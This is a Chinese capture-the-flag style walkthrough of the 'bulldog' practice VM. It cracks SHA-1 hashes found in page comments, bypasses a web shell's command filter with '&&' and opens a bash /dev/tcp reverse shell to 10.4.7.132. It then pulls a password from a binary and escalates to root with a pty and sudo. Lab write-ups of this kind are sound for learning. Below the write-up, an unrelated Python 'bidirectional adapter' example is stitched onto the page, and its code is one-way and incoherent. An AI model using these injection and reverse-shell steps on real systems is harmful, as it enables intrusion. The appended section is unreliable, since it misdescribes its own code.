bulldog 靶机

bulldog

信息搜集

存活检测

image-20231019132847932

详细扫描

image-20231019135132191

后台网页扫描

image-20231019135202749

网页信息搜集

image-20231019204915864

image-20231019140101794

正在开发的如果你正在读这篇文章,你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板,组长艾伦·布鲁克。CEO解雇了整个开发团队和员工。因此,我们需要迅速招到一批人。我要试着给你上一堂牛头犬工业网站的速成课。之前的网站是怎么被攻击的?APT利用了网络服务器上的一个漏洞获得了一个低权限shell。从那里,他们利用脏牛在盒子上生根。在那之后,整个系统被接管,他们破坏了网站。我们仍在从旧系统向新系统过渡。同时,我们正在使用一些文件,这些文件可能是从原始系统中损坏的。我们还没来得及确认有没有被黑的痕迹所以如果你发现了,给我发邮件。我们如何防止未来的违规行为?应Churchy先生的要求,我们将从新服务器上完全移除PHP。此外,我们不会使用PHPMyAdmin或任何其他流行的CMS系统。我们的任务是创造我们自己的。新系统的设计?新网站将完全用Django编写(Mr. Churchy要求“高端技术时髦的东西”)。到目前为止,系统上已经启用了SSH。当我们将转换到使用Web-Shell(一个专有的shell接口)时,这个功能将很快关闭。下面的链接解释了这个工具。另外,请注意,我们将开始使用MongoDB,但是我们还没有完全安装它。还要注意的是,我们将实施一个革命性的AV系统,这是由供应商为我们定制的。它宣称能够每分钟运行一次,以检测入侵和黑客行为。一旦它启动并运行,我们将把它安装到系统上。Web-Shell我该找谁开始呢?组长:alan@bulldogindustries.com备用组长:william@bulldogindustries.com前端:malik@bulldogindustries.com前端:kevin@bulldogindustries.com后端:ashley@bulldogindustries.com后端:nick@bulldogindustries.com数据库:sarah@bulldogindustries.com

在此界面的源码中发现了疑似加密的信息,依次解密查看

image-20231019205147493

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->.0

管理员登陆

  • 解析密码加密方式

    hash-identifier
    

  • sha-1 解密

    将密文存储到文件中

    image-20231019211911779

    john 解密

    john --format=raw-sha1 pas
    

    破解出密文 bulldog

    image-20231019212018179

  • 尝试当作密码登录管理员界面

    image-20231019212358962

    image-20231019212419125

    显示登陆成功,但没权限

  • 但此时 /dev/shell 界面可执行指令

    image-20231019212726765

反弹 shell

  • 执行允许的命令外的命令会被过滤

    image-20231019213719637

  • 尝试绕过

    /usr/bin/ping 127.0.0.1 -c 2
    

    失败

    image-20231019213806935

    pwd&&ping 127.0.0.1 -c 2
    

    image-20231019213845159

    可以使用 && 对过滤进行绕过

  • kali 开启监听

  • 命令框输入链接反弹 shell 命令

    pwd&&bash -c "bash -i >& /dev/tcp/10.4.7.132/7777 0>&1"
    

    image-20231019214246195

  • 成功连接

    image-20231019214305225

提权

  • 查找敏感文件

    image-20231019214633607

    image-20231019214659845

  • 查看二进制文件中可打印的字符

    strings customPermissionApp
    

    image-20231019214758371

    密码

    SUPERultimatePASSWORDyouCANTget
    
  • 切换用户,提示必须在终端执行

    image-20231019215418343

  • 创建一个新的终端

    python -c 'import pty;pty.spawn("/bin/sh")'
    
  • 切换 root

    sudo su root
    

    输入密码,提权成功

    image-20231019215917845

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值